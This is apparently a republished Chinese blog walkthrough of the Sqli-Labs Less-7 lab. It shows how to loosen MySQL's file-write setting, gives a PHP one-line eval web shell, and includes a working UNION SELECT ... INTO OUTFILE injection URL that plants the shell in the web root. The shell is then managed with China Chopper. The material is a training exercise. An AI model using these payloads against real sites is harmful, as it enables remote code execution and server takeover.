zoukankan      html  css  js  c++  java
  • Sqli-Labs less-7

    less-7

    前置基础知识:

    1. 因为我们用的是phpstudy,所以存在一个文件读写权限问题,我们需要修改一下

    首先在mysql命令行中用show variables like '%secure%';查看 secure-file-priv 当前的值,如果显示为NULL,则需要打开 C:phpstudyPHPTutorialMySQLmy.ini文件,在其中加上一句:secure_file_priv=“/”。

     

     之后重启PHP study,然后发现已经发现发生了改变,说明修改成功,就可以进行读写了。

     第二个知识就是一句话木马

    一句话木马有多个版本的,asp php的

    这里我们只用到php版本的一句话木马:

    <?php @eval($_POST[“crow”]);?> 其中crow是密码

    一句话木马大多配合中国菜刀使用,菜刀的使用可以参考:https://www.daixiaorui.com/read/17.html

    以及第三个知识,用到的两个函数:load_file()  读取本地文件  into outfile 写文件    可以百度函数用法,提示路径需要用双斜线

    我们看到提示使用函数outfile,并且可以确定存在注入漏洞

     

    之后我们用outfile将一句话木马写入文件,虽然依然显示报错,但是我们发现路径下已经存在了我们想要的文件

    http://192.168.5.100/sqli-labs/Less-7/?id=-1')) union select 1,2,'<?php @eval($_POST[“crow”]);?>' into outfile "C:\phpstudy\PHPTutorial\WWW\sqli-labs\Less-7\test.php" --+

     

     这里注意一句话木马里面的引号里面的就是密码,我们用中国菜刀进行连接:

     我们可以看到i,已经成功连接,可以进行文件管理

    其实,用中国菜刀比较简单,我们当然也可以把注入的内容回显的数据用outfile输出到文件中,步骤和前几关就类似了。

  • 相关阅读:
    C语言基础知识-程序流程结构
    C语言基础知识-运算符与表达式
    Cloudera Certified Associate Administrator案例之Configure篇
    Python入门篇-文件操作
    gif软件(ShareX)
    BareTail(日志查看工具)
    [UGUI]游戏中的Tips贴图标边缘显示(贴边)
    Lua中的#
    ugui SetParent在安卓上一个诡异bug
    .svn文件夹特别大
  • 原文地址:https://www.cnblogs.com/hzk001/p/12217516.html
Copyright © 2011-2022 走看看